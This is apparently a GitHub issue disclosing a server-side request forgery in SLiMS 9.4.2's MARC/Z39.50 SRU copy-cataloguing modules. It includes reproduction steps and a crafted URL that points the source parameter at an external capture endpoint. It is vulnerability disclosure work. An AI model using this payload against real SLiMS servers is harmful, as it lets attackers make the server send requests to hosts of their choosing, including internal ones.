Skip to content

[Security Bugs] Server Side Request Forgery #158

Closed
@0xdc9

Description

@0xdc9

The bug
A Server Side Request Forgery exists in admin/modules/bibliography/marcsru.php and admin/modules/bibliography/z3950sru.php due to the class in lib/marc/XMLParser.inc.php

Reproduce
Steps to reproduce the behavior:

  1. Go to http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography then go to copy cataloguing
  2. choose between marc sru or 23950sru
  3. type in something what you want in the search bar
  4. set burpsuite intercept on
  5. change the z3950_SRU_source or marc_SRU_source parameter value to some url that grab the traffic
  6. forward the request
  7. or just visit http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN

Screenshots
Normal requests

Screen Shot 2022-08-12 at 04 11 39

Tampered and SSRF trigger(netcat)

Screen Shot 2022-08-12 at 04 13 21

Tampered and SSRF trigger(toptal.com)

Screen Shot 2022-08-12 at 04 22 25

Versions

  • OS: MacOS Mojave 10.14.6
  • Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64)
  • Slims Version: slims9_bulian-9.4.2

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions